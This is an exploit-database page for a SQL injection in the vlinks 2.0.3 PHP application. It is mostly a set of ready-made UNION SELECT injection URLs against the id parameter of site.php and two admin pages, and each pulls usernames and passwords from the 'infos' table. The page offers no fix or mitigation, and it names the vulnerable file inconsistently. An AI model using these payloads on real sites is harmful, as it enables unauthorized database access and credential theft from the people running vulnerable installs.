[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

vlinks 2.0.3 (site.php id parameter) SQL Injection

Author
JiKo
Risk
[
Security Risk High
]
0day-ID
0day-ID-19267
Category
web applications
Date add
27-08-2012
Platform
php
#########################################################################################
[!x!] Informations:
  
Name           : vlinks
Download       : http://www.vlinks.org/ =>http://www.vlinks.org/telechargements/Vlinks2.0.3.zip (And All Version)
Vulnerability  : Sql Injection
Author         : JIKO(JAWAD)
Contact        : jalikom@hotmail.com
Site           : No-ExploiT.CoM (Is Back)
Notes          : No-ExploiT.CoM Miss
#########################################################################################
[!x!] Bug:
  
Bugged file is /[path]/page.php?
  
[Note]
Pass Simple
[/Note]
  
#########################################################################################
[!x!] Exploit:
  
Exploit: http://no-exploit.com/forum/site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--
 
[Admin Panel] ! Need Login
Exploit: http://no-exploit.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
  
########################################################################################
[!x!] To: All friends
Cyber_Devil Allah with you



#  0day.today [2024-11-16]  #